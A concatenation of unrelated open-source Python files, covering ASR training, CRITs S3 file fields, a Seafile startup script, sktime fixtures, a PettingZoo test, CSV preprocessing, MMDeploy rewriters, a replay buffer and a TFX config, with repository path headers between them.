def on_stage_end(self, stage, stage_loss, epoch):
"""Gets called at the end of an epoch."""
# Compute/store important stats
stage_stats = {"loss": stage_loss}
if stage == sb.Stage.TRAIN:
self.train_stats = stage_stats
else:
stage_stats["CER"] = self.cer_metric.summarize("error_rate")
stage_stats["WER"] = self.wer_metric.summarize("error_rate")
# Perform end-of-iteration things, like annealing, logging, etc.
if stage == sb.Stage.VALID:
old_lr_model, new_lr_model = self.hparams.lr_annealing_model(
stage_stats["loss"]
)
old_lr_wav2vec, new_lr_wav2vec = self.hparams.lr_annealing_wav2vec(
stage_stats["loss"]
)
sb.nnet.schedulers.update_learning_rate(
self.model_optimizer, new_lr_model
)
sb.nnet.schedulers.update_learning_rate(
self.wav2vec_optimizer, new_lr_wav2vec
)
self.hparams.train_logger.log_stats(
stats_meta={
"epoch": epoch,
"lr_model": old_lr_model,
"lr_wav2vec": old_lr_wav2vec,
},
train_stats=self.train_stats,
valid_stats=stage_stats,
)
self.checkpointer.save_and_keep_only(
meta={"WER": stage_stats["WER"]}, min_keys=["WER"],
)
elif stage == sb.Stage.TEST:
self.hparams.train_logger.log_stats(
stats_meta={"Epoch loaded": self.hparams.epoch_counter.current},
test_stats=stage_stats,
)
with open(self.hparams.wer_file, "w") as w:
self.wer_metric.write_stats(w)
def init_optimizers(self):
"Initializes the wav2vec2 optimizer and model optimizer"
self.wav2vec_optimizer = self.hparams.wav2vec_opt_class(
self.modules.wav2vec2.parameters()
)
self.model_optimizer = self.hparams.model_opt_class(
self.hparams.model.parameters()
)
if self.checkpointer is not None:
self.checkpointer.add_recoverable(
"wav2vec_opt", self.wav2vec_optimizer
)
self.checkpointer.add_recoverable("modelopt", self.model_optimizer)
def dataio_prepare(hparams):
"""This function prepares the datasets to be used in the brain class.
It also defines the data processing pipeline through user-defined functions."""
data_folder = hparams["data_folder"]
train_data = sb.dataio.dataset.DynamicItemDataset.from_csv(
csv_path=hparams["train_csv"], replacements={"data_root": data_folder},
)
if hparams["sorting"] == "ascending":
# we sort training data to speed up training and get better results.
train_data = train_data.filtered_sorted(sort_key="duration")
# when sorting do not shuffle in dataloader ! otherwise is pointless
hparams["train_dataloader_opts"]["shuffle"] = False
elif hparams["sorting"] == "descending":
train_data = train_data.filtered_sorted(
sort_key="duration", reverse=True
)
# when sorting do not shuffle in dataloader ! otherwise is pointless
hparams["train_dataloader_opts"]["shuffle"] = False
elif hparams["sorting"] == "random":
pass
else:
raise NotImplementedError(
"sorting must be random, ascending or descending"
)
valid_data = sb.dataio.dataset.DynamicItemDataset.from_csv(
csv_path=hparams["valid_csv"], replacements={"data_root": data_folder},
)
valid_data = valid_data.filtered_sorted(sort_key="duration")
# test is separate
test_datasets = {}
for csv_file in hparams["test_csv"]:
name = Path(csv_file).stem
test_datasets[name] = sb.dataio.dataset.DynamicItemDataset.from_csv(
csv_path=csv_file, replacements={"data_root": data_folder}
)
test_datasets[name] = test_datasets[name].filtered_sorted(
sort_key="duration"
)
datasets = [train_data, valid_data] + [i for k, i in test_datasets.items()]
# 2. Define audio pipeline:
@sb.utils.data_pipeline.takes("wav")
@sb.utils.data_pipeline.provides("sig")
def audio_pipeline(wav):
sig = sb.dataio.dataio.read_audio(wav)
return sig
sb.dataio.dataset.add_dynamic_item(datasets, audio_pipeline)
label_encoder = sb.dataio.encoder.CTCTextEncoder()
# 3. Define text pipeline:
@sb.utils.data_pipeline.takes("wrd")
@sb.utils.data_pipeline.provides(
"wrd", "char_list", "tokens_list", "tokens_bos", "tokens_eos", "tokens"
)
def text_pipeline(wrd):
yield wrd
char_list = list(wrd)
yield char_list
tokens_list = label_encoder.encode_sequence(char_list)
yield tokens_list
tokens_bos = torch.LongTensor([hparams["bos_index"]] + (tokens_list))
yield tokens_bos
tokens_eos = torch.LongTensor(tokens_list + [hparams["eos_index"]])
yield tokens_eos
tokens = torch.LongTensor(tokens_list)
yield tokens
sb.dataio.dataset.add_dynamic_item(datasets, text_pipeline)
lab_enc_file = os.path.join(hparams["save_folder"], "label_encoder.txt")
special_labels = {
"bos_label": hparams["bos_index"],
"eos_label": hparams["eos_index"],
"blank_label": hparams["blank_index"],
}
label_encoder.load_or_create(
path=lab_enc_file,
from_didatasets=[train_data],
output_key="char_list",
special_labels=special_labels,
sequence_input=True,
)
# 4. Set output:
sb.dataio.dataset.set_output_keys(
datasets,
["id", "sig", "wrd", "char_list", "tokens_bos", "tokens_eos", "tokens"],
)
return train_data, valid_data, test_datasets, label_encoder
if __name__ == "__main__":
# CLI:
hparams_file, run_opts, overrides = sb.parse_arguments(sys.argv[1:])
# If distributed_launch=True then
# create ddp_group with the right communication protocol
sb.utils.distributed.ddp_init_group(run_opts)
with open(hparams_file) as fin:
hparams = load_hyperpyyaml(fin, overrides)
# Create experiment directory
sb.create_experiment_directory(
experiment_directory=hparams["output_folder"],
hyperparams_to_save=hparams_file,
overrides=overrides,
)
# Dataset prep (parsing Librispeech)
from librispeech_prepare import prepare_librispeech # noqa
# multi-gpu (ddp) save data preparation
run_on_main(
prepare_librispeech,
kwargs={
"data_folder": hparams["data_folder"],
"tr_splits": hparams["train_splits"],
"dev_splits": hparams["dev_splits"],
"te_splits": hparams["test_splits"],
"save_folder": hparams["output_folder"],
"merge_lst": hparams["train_splits"],
"merge_name": "train.csv",
"skip_prep": hparams["skip_prep"],
},
)
# here we create the datasets objects as well as tokenization and encoding
train_data, valid_data, test_datasets, label_encoder = dataio_prepare(
hparams
)
# Trainer initialization
asr_brain = ASR(
modules=hparams["modules"],
hparams=hparams,
run_opts=run_opts,
checkpointer=hparams["checkpointer"],
)
# We dynamicaly add the tokenizer to our brain class.
# NB: This tokenizer corresponds to the one used for the LM!!
asr_brain.tokenizer = label_encoder
# Training
asr_brain.fit(
asr_brain.hparams.epoch_counter,
train_data,
valid_data,
train_loader_kwargs=hparams["train_dataloader_opts"],
valid_loader_kwargs=hparams["valid_dataloader_opts"],
)
# Testing
for k in test_datasets.keys(): # keys are test_clean, test_other etc
asr_brain.hparams.wer_file = os.path.join(
hparams["output_folder"], "wer_{}.txt".format(k)
)
asr_brain.evaluate(
test_datasets[k], test_loader_kwargs=hparams["test_dataloader_opts"]
)
|
crits/core/fields.py | dutrow/crits | 738 | 18226 | import datetime
from dateutil.parser import parse
from mongoengine import DateTimeField, FileField
from mongoengine.connection import DEFAULT_CONNECTION_NAME
#from mongoengine.python_support import str_types
from six import string_types as str_types
import io
from django.conf import settings
if settings.FILE_DB == settings.S3:
import crits.core.s3_tools as S3
class CritsDateTimeField(DateTimeField):
"""
Custom MongoEngine DateTimeField. Utilizes a transform such that if the
value passed in is a string we will convert it to a datetime.datetime
object, or if it is set to None we will use the current datetime (useful
when instantiating new objects and wanting the default dates to all be the
current datetime).
"""
def __set__(self, instance, value):
value = self.transform(value)
return super(CritsDateTimeField, self).__set__(instance, value)
def transform(self, value):
if value and isinstance(value, basestring):
return parse(value, fuzzy=True)
elif not value:
return datetime.datetime.now()
else:
return value
class S3Proxy(object):
"""
Custom proxy for MongoEngine which uses S3 to store binaries instead of
GridFS.
"""
def __init__(self, grid_id=None, key=None, instance=None,
db_alias=DEFAULT_CONNECTION_NAME, collection_name='fs'):
self.grid_id = grid_id # Store id for file
self.key = key
self.instance = instance
self.db_alias = db_alias
self.collection_name = collection_name
self.newfile = None # Used for partial writes
self.gridout = None
def __getattr__(self, name):
attrs = ('_fs', 'grid_id', 'key', 'instance', 'db_alias',
'collection_name', 'newfile', 'gridout')
if name in attrs:
return self.__getattribute__(name)
obj = self.get()
if name in dir(obj):
return getattr(obj, name)
raise AttributeError
def __get__(self, instance, value):
return self
def __repr__(self):
return '<%s: %s>' % (self.__class__.__name__, self.grid_id)
def delete(self):
# Delete file from S3, FileField still remains
S3.delete_file_s3(self.grid_id,self.collection_name)
self.grid_id = None
self.gridout = None
self._mark_as_changed()
def get(self, id=None):
if id:
self.grid_id = id
if self.grid_id is None:
return None
try:
if self.gridout is None:
self.gridout = io.BytesIO(S3.get_file_s3(self.grid_id, self.collection_name))
return self.gridout
except:
return None
def put(self, file_obj, **kwargs):
if self.grid_id:
raise Exception('This document already has a file. Either delete '
'it or call replace to overwrite it')
self.grid_id = S3.put_file_s3(file_obj, self.collection_name)
self._mark_as_changed()
def read(self, size=-1):
gridout = self.get()
if gridout is None:
return None
else:
try:
return gridout.read(size)
except:
return ""
def _mark_as_changed(self):
"""Inform the instance that `self.key` has been changed"""
if self.instance:
self.instance._mark_as_changed(self.key)
class S3FileField(FileField):
"""
Custom FileField for MongoEngine which utilizes S3.
"""
def __init__(self, db_alias=DEFAULT_CONNECTION_NAME, collection_name="fs",
**kwargs):
super(S3FileField, self).__init__(db_alias, collection_name, **kwargs)
self.proxy_class = S3Proxy
def __set__(self, instance, value):
key = self.name
if ((hasattr(value, 'read') and not
isinstance(value, self.proxy_class)) or isinstance(value, str_types)):
# using "FileField() = file/string" notation
grid_file = instance._data.get(self.name)
# If a file already exists, delete it
if grid_file:
try:
grid_file.delete()
except:
pass
# Create a new file with the new data
grid_file.put(value)
else:
# Create a new proxy object as we don't already have one
instance._data[key] = self.proxy_class(key=key, instance=instance,
collection_name=self.collection_name)
instance._data[key].put(value)
else:
instance._data[key] = value
instance._mark_as_changed(key)
def getFileField(db_alias=DEFAULT_CONNECTION_NAME, collection_name="fs", **kwargs):
"""
Determine if the admin has configured CRITs to utilize GridFS or S3 for
binary storage.
"""
if settings.FILE_DB == settings.GRIDFS:
return FileField(db_alias, collection_name, **kwargs)
elif settings.FILE_DB == settings.S3:
return S3FileField(db_alias, collection_name, **kwargs)
|
cluster/image/pro_seafile_7.1/scripts_7.1/start.py | chaosbunker/seafile-docker | 503 | 18229 | #!/usr/bin/env python3
#coding: UTF-8
import os
import sys
import time
import json
import argparse
from os.path import join, exists, dirname
from upgrade import check_upgrade
from utils import call, get_conf, get_script, get_command_output, get_install_dir
installdir = get_install_dir()
topdir = dirname(installdir)
def watch_controller():
maxretry = 4
retry = 0
while retry < maxretry:
controller_pid = get_command_output('ps aux | grep seafile-controller | grep -v grep || true').strip()
garbage_collector_pid = get_command_output('ps aux | grep /scripts/gc.sh | grep -v grep || true').strip()
if not controller_pid and not garbage_collector_pid:
retry += 1
else:
retry = 0
time.sleep(5)
print('seafile controller exited unexpectedly.')
sys.exit(1)
def main(args):
call('/scripts/create_data_links.sh')
# check_upgrade()
os.chdir(installdir)
call('service nginx start &')
admin_pw = {
'email': get_conf('SEAFILE_ADMIN_EMAIL', '<EMAIL>'),
'password': get_conf('SEAFILE_ADMIN_PASSWORD', '<PASSWORD>'),
}
password_file = join(topdir, 'conf', 'admin.txt')
with open(password_file, 'w+') as fp:
json.dump(admin_pw, fp)
try:
call('{} start'.format(get_script('seafile.sh')))
call('{} start'.format(get_script('seahub.sh')))
if args.mode == 'backend':
call('{} start'.format(get_script('seafile-background-tasks.sh')))
finally:
if exists(password_file):
os.unlink(password_file)
print('seafile server is running now.')
try:
watch_controller()
except KeyboardInterrupt:
print('Stopping seafile server.')
sys.exit(0)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Seafile cluster start script')
parser.add_argument('--mode')
main(parser.parse_args())
|
sktime/datatypes/_panel/_examples.py | marcio55afr/sktime | 5,349 | 18238 | <filename>sktime/datatypes/_panel/_examples.py<gh_stars>1000+
# -*- coding: utf-8 -*-
"""Example generation for testing.
Exports dict of examples, useful for testing as fixtures.
example_dict: dict indexed by triple
1st element = mtype - str
2nd element = considered as this scitype - str
3rd element = int - index of example
elements are data objects, considered examples for the mtype
all examples with same index are considered "same" on scitype content
if None, indicates that representation is not possible
example_lossy: dict of bool indexed by pairs of str
1st element = mtype - str
2nd element = considered as this scitype - str
3rd element = int - index of example
elements are bool, indicate whether representation has information removed
all examples with same index are considered "same" on scitype content
overall, conversions from non-lossy representations to any other ones
should yield the element exactly, identidally (given same index)
"""
import pandas as pd
import numpy as np
example_dict = dict()
example_dict_lossy = dict()
###
X = np.array(
[[[1, 2, 3], [4, 5, 6]], [[1, 2, 3], [4, 55, 6]], [[1, 2, 3], [42, 5, 6]]],
dtype=np.int64,
)
example_dict[("numpy3D", "Panel", 0)] = X
example_dict_lossy[("numpy3D", "Panel", 0)] = False
cols = [f"var_{i}" for i in range(2)]
Xlist = [
pd.DataFrame([[1, 4], [2, 5], [3, 6]], columns=cols),
pd.DataFrame([[1, 4], [2, 55], [3, 6]], columns=cols),
pd.DataFrame([[1, 42], [2, 5], [3, 6]], columns=cols),
]
example_dict[("df-list", "Panel", 0)] = Xlist
example_dict_lossy[("df-list", "Panel", 0)] = False
cols = ["instances", "timepoints"] + [f"var_{i}" for i in range(2)]
Xlist = [
pd.DataFrame([[0, 0, 1, 4], [0, 1, 2, 5], [0, 2, 3, 6]], columns=cols),
pd.DataFrame([[1, 0, 1, 4], [1, 1, 2, 55], [1, 2, 3, 6]], columns=cols),
pd.DataFrame([[2, 0, 1, 42], [2, 1, 2, 5], [2, 2, 3, 6]], columns=cols),
]
X = pd.concat(Xlist)
X = X.set_index(["instances", "timepoints"])
example_dict[("pd-multiindex", "Panel", 0)] = X
example_dict_lossy[("pd-multiindex", "Panel", 0)] = False
cols = [f"var_{i}" for i in range(2)]
X = pd.DataFrame(columns=cols, index=[0, 1, 2])
X["var_0"] = pd.Series(
[pd.Series([1, 2, 3]), pd.Series([1, 2, 3]), pd.Series([1, 2, 3])]
)
X["var_1"] = pd.Series(
[pd.Series([4, 5, 6]), pd.Series([4, 55, 6]), pd.Series([42, 5, 6])]
)
example_dict[("nested_univ", "Panel", 0)] = X
example_dict_lossy[("nested_univ", "Panel", 0)] = False
|
pettingzoo/test/max_cycles_test.py | RedTachyon/PettingZoo | 846 | 18244 | <filename>pettingzoo/test/max_cycles_test.py
import numpy as np
def max_cycles_test(mod):
max_cycles = 4
parallel_env = mod.parallel_env(max_cycles=max_cycles)
observations = parallel_env.reset()
dones = {agent: False for agent in parallel_env.agents}
test_cycles = max_cycles + 10 # allows environment to do more than max_cycles if it so wishes
for step in range(test_cycles):
actions = {agent: parallel_env.action_space(agent).sample() for agent in parallel_env.agents if not dones[agent]}
observations, rewards, dones, infos = parallel_env.step(actions)
if all(dones.values()):
break
pstep = step + 1
env = mod.env(max_cycles=max_cycles)
env.reset()
agent_counts = np.zeros(len(env.possible_agents))
for a in env.agent_iter():
# counts agent index
aidx = env.possible_agents.index(a)
agent_counts[aidx] += 1
action = env.action_space(a).sample() if not env.dones[a] else None
env.step(action)
assert max_cycles == pstep
# does not check the minimum value because some agents might be killed before
# all the steps are complete. However, most agents should still be alive
# given a short number of cycles
assert max_cycles == np.max(agent_counts) - 1
assert max_cycles == np.median(agent_counts) - 1
|
solutionbox/structured_data/mltoolbox/_structured_data/preprocess/local_preprocess.py | freyrsae/pydatalab | 198 | 18258 | <gh_stars>100-1000
# Copyright 2017 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import argparse
import collections
import json
import os
import six
import sys
from tensorflow.python.lib.io import file_io
SCHEMA_FILE = 'schema.json'
NUMERICAL_ANALYSIS_FILE = 'stats.json'
CATEGORICAL_ANALYSIS_FILE = 'vocab_%s.csv'
def parse_arguments(argv):
"""Parse command line arguments.
Args:
argv: list of command line arguments, includeing programe name.
Returns:
An argparse Namespace object.
"""
parser = argparse.ArgumentParser(
description='Runs Preprocessing on structured CSV data.')
parser.add_argument('--input-file-pattern',
type=str,
required=True,
help='Input CSV file names. May contain a file pattern')
parser.add_argument('--output-dir',
type=str,
required=True,
help='Google Cloud Storage which to place outputs.')
parser.add_argument('--schema-file',
type=str,
required=True,
help=('BigQuery json schema file'))
args = parser.parse_args(args=argv[1:])
# Make sure the output folder exists if local folder.
file_io.recursive_create_dir(args.output_dir)
return args
def run_numerical_categorical_analysis(args, schema_list):
"""Makes the numerical and categorical analysis files.
Args:
args: the command line args
schema_list: python object of the schema json file.
Raises:
ValueError: if schema contains unknown column types.
"""
header = [column['name'] for column in schema_list]
input_files = file_io.get_matching_files(args.input_file_pattern)
# Check the schema is valid
for col_schema in schema_list:
col_type = col_schema['type'].lower()
if col_type != 'string' and col_type != 'integer' and col_type != 'float':
raise ValueError('Schema contains an unsupported type %s.' % col_type)
# initialize the results
def _init_numerical_results():
return {'min': float('inf'),
'max': float('-inf'),
'count': 0,
'sum': 0.0}
numerical_results = collections.defaultdict(_init_numerical_results)
categorical_results = collections.defaultdict(set)
# for each file, update the numerical stats from that file, and update the set
# of unique labels.
for input_file in input_files:
with file_io.FileIO(input_file, 'r') as f:
for line in f:
parsed_line = dict(zip(header, line.strip().split(',')))
for col_schema in schema_list:
col_name = col_schema['name']
col_type = col_schema['type']
if col_type.lower() == 'string':
categorical_results[col_name].update([parsed_line[col_name]])
else:
# numerical column.
# if empty, skip
if not parsed_line[col_name].strip():
continue
numerical_results[col_name]['min'] = (
min(numerical_results[col_name]['min'],
float(parsed_line[col_name])))
numerical_results[col_name]['max'] = (
max(numerical_results[col_name]['max'],
float(parsed_line[col_name])))
numerical_results[col_name]['count'] += 1
numerical_results[col_name]['sum'] += float(parsed_line[col_name])
# Update numerical_results to just have min/min/mean
for col_schema in schema_list:
if col_schema['type'].lower() != 'string':
col_name = col_schema['name']
mean = numerical_results[col_name]['sum'] / numerical_results[col_name]['count']
del numerical_results[col_name]['sum']
del numerical_results[col_name]['count']
numerical_results[col_name]['mean'] = mean
# Write the numerical_results to a json file.
file_io.write_string_to_file(
os.path.join(args.output_dir, NUMERICAL_ANALYSIS_FILE),
json.dumps(numerical_results, indent=2, separators=(',', ': ')))
# Write the vocab files. Each label is on its own line.
for name, unique_labels in six.iteritems(categorical_results):
labels = '\n'.join(list(unique_labels))
file_io.write_string_to_file(
os.path.join(args.output_dir, CATEGORICAL_ANALYSIS_FILE % name),
labels)
def run_analysis(args):
"""Builds an analysis files for training."""
# Read the schema and input feature types
schema_list = json.loads(
file_io.read_file_to_string(args.schema_file))
run_numerical_categorical_analysis(args, schema_list)
# Also save a copy of the schema in the output folder.
file_io.copy(args.schema_file,
os.path.join(args.output_dir, SCHEMA_FILE),
overwrite=True)
def main(argv=None):
args = parse_arguments(sys.argv if argv is None else argv)
run_analysis(args)
if __name__ == '__main__':
main()
|
mne/datasets/kiloword/__init__.py | fmamashli/mne-python | 1,953 | 18270 | """MNE visual_92_categories dataset."""
from .kiloword import data_path, get_version
|
mmdeploy/codebase/mmdet/models/roi_heads/test_mixins.py | zhiqwang/mmdeploy | 746 | 18328 | <reponame>zhiqwang/mmdeploy<filename>mmdeploy/codebase/mmdet/models/roi_heads/test_mixins.py<gh_stars>100-1000
# Copyright (c) OpenMMLab. All rights reserved.
import torch
from mmdeploy.core import FUNCTION_REWRITER
@FUNCTION_REWRITER.register_rewriter(
'mmdet.models.roi_heads.test_mixins.BBoxTestMixin.simple_test_bboxes')
def bbox_test_mixin__simple_test_bboxes(ctx,
self,
x,
img_metas,
proposals,
rcnn_test_cfg,
rescale=False):
"""Rewrite `simple_test_bboxes` of `BBoxTestMixin` for default backend.
1. This function eliminates the batch dimension to get forward bbox
results, and recover batch dimension to calculate final result
for deployment.
2. This function returns detection result as Tensor instead of numpy
array.
Args:
ctx (ContextCaller): The context with additional information.
self: The instance of the original class.
x (tuple[Tensor]): Features from upstream network. Each
has shape (batch_size, c, h, w).
img_metas (list[dict]): Meta information of images.
proposals (list(Tensor)): Proposals from rpn head.
Each has shape (num_proposals, 5), last dimension
5 represent (x1, y1, x2, y2, score).
rcnn_test_cfg (obj:`ConfigDict`): `test_cfg` of R-CNN.
rescale (bool): If True, return boxes in original image space.
Default: False.
Returns:
tuple[Tensor, Tensor]: (det_bboxes, det_labels), `det_bboxes` of
shape [N, num_det, 5] and `det_labels` of shape [N, num_det].
"""
rois = proposals
batch_index = torch.arange(
rois.shape[0], device=rois.device).float().view(-1, 1, 1).expand(
rois.size(0), rois.size(1), 1)
rois = torch.cat([batch_index, rois[..., :4]], dim=-1)
batch_size = rois.shape[0]
num_proposals_per_img = rois.shape[1]
# Eliminate the batch dimension
rois = rois.view(-1, 5)
bbox_results = self._bbox_forward(x, rois)
cls_score = bbox_results['cls_score']
bbox_pred = bbox_results['bbox_pred']
# Recover the batch dimension
rois = rois.reshape(batch_size, num_proposals_per_img, rois.size(-1))
cls_score = cls_score.reshape(batch_size, num_proposals_per_img,
cls_score.size(-1))
bbox_pred = bbox_pred.reshape(batch_size, num_proposals_per_img,
bbox_pred.size(-1))
det_bboxes, det_labels = self.bbox_head.get_bboxes(
rois,
cls_score,
bbox_pred,
img_metas[0]['img_shape'],
None,
rescale=rescale,
cfg=rcnn_test_cfg)
return det_bboxes, det_labels
@FUNCTION_REWRITER.register_rewriter(
'mmdet.models.roi_heads.test_mixins.MaskTestMixin.simple_test_mask')
def mask_test_mixin__simple_test_mask(ctx, self, x, img_metas, det_bboxes,
det_labels, **kwargs):
"""Rewrite `simple_test_mask` of `BBoxTestMixin` for default backend.
This function returns detection result as Tensor instead of numpy
array.
Args:
ctx (ContextCaller): The context with additional information.
self: The instance of the original class.
x (tuple[Tensor]): Features from upstream network. Each
has shape (batch_size, c, h, w).
img_metas (list[dict]): Meta information of images.
det_bboxes (tuple[Tensor]): Detection bounding-boxes from features.
Each has shape of (batch_size, num_det, 5).
det_labels (tuple[Tensor]): Detection labels from features. Each
has shape of (batch_size, num_det).
Returns:
tuple[Tensor]: (segm_results), `segm_results` of shape
[N, num_det, roi_H, roi_W].
"""
batch_size = det_bboxes.size(0)
det_bboxes = det_bboxes[..., :4]
batch_index = torch.arange(
det_bboxes.size(0),
device=det_bboxes.device).float().view(-1, 1, 1).expand(
det_bboxes.size(0), det_bboxes.size(1), 1)
mask_rois = torch.cat([batch_index, det_bboxes], dim=-1)
mask_rois = mask_rois.view(-1, 5)
mask_results = self._mask_forward(x, mask_rois)
mask_pred = mask_results['mask_pred']
max_shape = img_metas[0]['img_shape']
num_det = det_bboxes.shape[1]
det_bboxes = det_bboxes.reshape(-1, 4)
det_labels = det_labels.reshape(-1)
segm_results = self.mask_head.get_seg_masks(mask_pred, det_bboxes,
det_labels, self.test_cfg,
max_shape)
segm_results = segm_results.reshape(batch_size, num_det,
segm_results.shape[-2],
segm_results.shape[-1])
return segm_results
|
slm_lab/agent/memory/replay.py | jmribeiro/SLM-Lab | 1,074 | 18351 | <reponame>jmribeiro/SLM-Lab
from collections import deque
from copy import deepcopy
from slm_lab.agent.memory.base import Memory
from slm_lab.lib import logger, math_util, util
from slm_lab.lib.decorator import lab_api
import numpy as np
import pydash as ps
logger = logger.get_logger(__name__)
def sample_next_states(head, max_size, ns_idx_offset, batch_idxs, states, ns_buffer):
'''Method to sample next_states from states, with proper guard for next_state idx being out of bound'''
# idxs for next state is state idxs with offset, modded
ns_batch_idxs = (batch_idxs + ns_idx_offset) % max_size
# if head < ns_idx <= head + ns_idx_offset, ns is stored in ns_buffer
ns_batch_idxs = ns_batch_idxs % max_size
buffer_ns_locs = np.argwhere(
(head < ns_batch_idxs) & (ns_batch_idxs <= head + ns_idx_offset)).flatten()
# find if there is any idxs to get from buffer
to_replace = buffer_ns_locs.size != 0
if to_replace:
# extract the buffer_idxs first for replacement later
# given head < ns_idx <= head + offset, and valid buffer idx is [0, offset)
# get 0 < ns_idx - head <= offset, or equiv.
# get -1 < ns_idx - head - 1 <= offset - 1, i.e.
# get 0 <= ns_idx - head - 1 < offset, hence:
buffer_idxs = ns_batch_idxs[buffer_ns_locs] - head - 1
# set them to 0 first to allow sampling, then replace later with buffer
ns_batch_idxs[buffer_ns_locs] = 0
# guard all against overrun idxs from offset
ns_batch_idxs = ns_batch_idxs % max_size
next_states = util.batch_get(states, ns_batch_idxs)
if to_replace:
# now replace using buffer_idxs and ns_buffer
buffer_ns = util.batch_get(ns_buffer, buffer_idxs)
next_states[buffer_ns_locs] = buffer_ns
return next_states
class Replay(Memory):
'''
Stores agent experiences and samples from them for agent training
An experience consists of
- state: representation of a state
- action: action taken
- reward: scalar value
- next state: representation of next state (should be same as state)
- done: 0 / 1 representing if the current state is the last in an episode
The memory has a size of N. When capacity is reached, the oldest experience
is deleted to make space for the lastest experience.
- This is implemented as a circular buffer so that inserting experiences are O(1)
- Each element of an experience is stored as a separate array of size N * element dim
When a batch of experiences is requested, K experiences are sampled according to a random uniform distribution.
If 'use_cer', sampling will add the latest experience.
e.g. memory_spec
"memory": {
"name": "Replay",
"batch_size": 32,
"max_size": 10000,
"use_cer": true
}
'''
def __init__(self, memory_spec, body):
super().__init__(memory_spec, body)
util.set_attr(self, self.memory_spec, [
'batch_size',
'max_size',
'use_cer',
])
self.is_episodic = False
self.batch_idxs = None
self.size = 0 # total experiences stored
self.seen_size = 0 # total experiences seen cumulatively
self.head = -1 # index of most recent experience
# generic next_state buffer to store last next_states (allow for multiple for venv)
self.ns_idx_offset = self.body.env.num_envs if body.env.is_venv else 1
self.ns_buffer = deque(maxlen=self.ns_idx_offset)
# declare what data keys to store
self.data_keys = ['states', 'actions', 'rewards', 'next_states', 'dones']
self.reset()
def reset(self):
'''Initializes the memory arrays, size and head pointer'''
# set self.states, self.actions, ...
for k in self.data_keys:
if k != 'next_states': # reuse self.states
# list add/sample is over 10x faster than np, also simpler to handle
setattr(self, k, [None] * self.max_size)
self.size = 0
self.head = -1
self.ns_buffer.clear()
@lab_api
def update(self, state, action, reward, next_state, done):
'''Interface method to update memory'''
if self.body.env.is_venv:
for sarsd in zip(state, action, reward, next_state, done):
self.add_experience(*sarsd)
else:
self.add_experience(state, action, reward, next_state, done)
def add_experience(self, state, action, reward, next_state, done):
'''Implementation for update() to add experience to memory, expanding the memory size if necessary'''
# Move head pointer. Wrap around if necessary
self.head = (self.head + 1) % self.max_size
self.states[self.head] = state.astype(np.float16)
self.actions[self.head] = action
self.rewards[self.head] = reward
self.ns_buffer.append(next_state.astype(np.float16))
self.dones[self.head] = done
# Actually occupied size of memory
if self.size < self.max_size:
self.size += 1
self.seen_size += 1
# set to_train using memory counters head, seen_size instead of tick since clock will step by num_envs when on venv; to_train will be set to 0 after training step
algorithm = self.body.agent.algorithm
algorithm.to_train = algorithm.to_train or (self.seen_size > algorithm.training_start_step and self.head % algorithm.training_frequency == 0)
@lab_api
def sample(self):
'''
Returns a batch of batch_size samples. Batch is stored as a dict.
Keys are the names of the different elements of an experience. Values are an array of the corresponding sampled elements
e.g.
batch = {
'states' : states,
'actions' : actions,
'rewards' : rewards,
'next_states': next_states,
'dones' : dones}
'''
self.batch_idxs = self.sample_idxs(self.batch_size)
batch = {}
for k in self.data_keys:
if k == 'next_states':
batch[k] = sample_next_states(self.head, self.max_size, self.ns_idx_offset, self.batch_idxs, self.states, self.ns_buffer)
else:
batch[k] = util.batch_get(getattr(self, k), self.batch_idxs)
return batch
def sample_idxs(self, batch_size):
'''Batch indices a sampled random uniformly'''
batch_idxs = np.random.randint(self.size, size=batch_size)
if self.use_cer: # add the latest sample
batch_idxs[-1] = self.head
return batch_idxs
|
06_reproducibility/workflow_pipeline/my_pipeline/pipeline/configs.py | fanchi/ml-design-patterns | 1,149 | 18389 | # Copyright 2020 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# NOTE: this is adapted from the official TFX taxi pipeline sample
# You can find it here: https://github.com/tensorflow/tfx/tree/master/tfx/examples/chicago_taxi_pipeline
import os # pylint: disable=unused-import
# Pipeline name will be used to identify this pipeline
PIPELINE_NAME = 'my_pipeline'
# TODO: replace with your Google Cloud project
GOOGLE_CLOUD_PROJECT='your-cloud-project'
# TODO: replace with the GCS bucket where you'd like to store model artifacts
# Only include the bucket name here, without the 'gs://'
GCS_BUCKET_NAME = 'your-gcs-bucket'
# TODO: set your Google Cloud region below (or use us-central1)
GOOGLE_CLOUD_REGION = 'us-central1'
RUN_FN = 'pipeline.model.run_fn'
TRAIN_NUM_STEPS = 100
EVAL_NUM_STEPS = 100
BIG_QUERY_WITH_DIRECT_RUNNER_BEAM_PIPELINE_ARGS = [
'--project=' + GOOGLE_CLOUD_PROJECT,
'--temp_location=' + os.path.join('gs://', GCS_BUCKET_NAME, 'tmp'),
]
# The rate at which to sample rows from the Chicago Taxi dataset using BigQuery.
# The full taxi dataset is > 120M record. In the interest of resource
# savings and time, we've set the default for this example to be much smaller.
# Feel free to crank it up and process the full dataset!
_query_sample_rate = 0.0001 # Generate a 0.01% random sample.
# The query that extracts the examples from BigQuery. This sample uses
# a BigQuery public dataset from NOAA
BIG_QUERY_QUERY = """
SELECT
usa_wind,
usa_sshs
FROM
`bigquery-public-data.noaa_hurricanes.hurricanes`
WHERE
latitude > 19.5
AND latitude < 64.85
AND longitude > -161.755
AND longitude < -68.01
AND usa_wind IS NOT NULL
AND longitude IS NOT NULL
AND latitude IS NOT NULL
AND usa_sshs IS NOT NULL
AND usa_sshs > 0
"""
# A dict which contains the training job parameters to be passed to Google
# Cloud AI Platform. For the full set of parameters supported by Google Cloud AI
# Platform, refer to
# https://cloud.google.com/ml-engine/reference/rest/v1/projects.jobs#Job
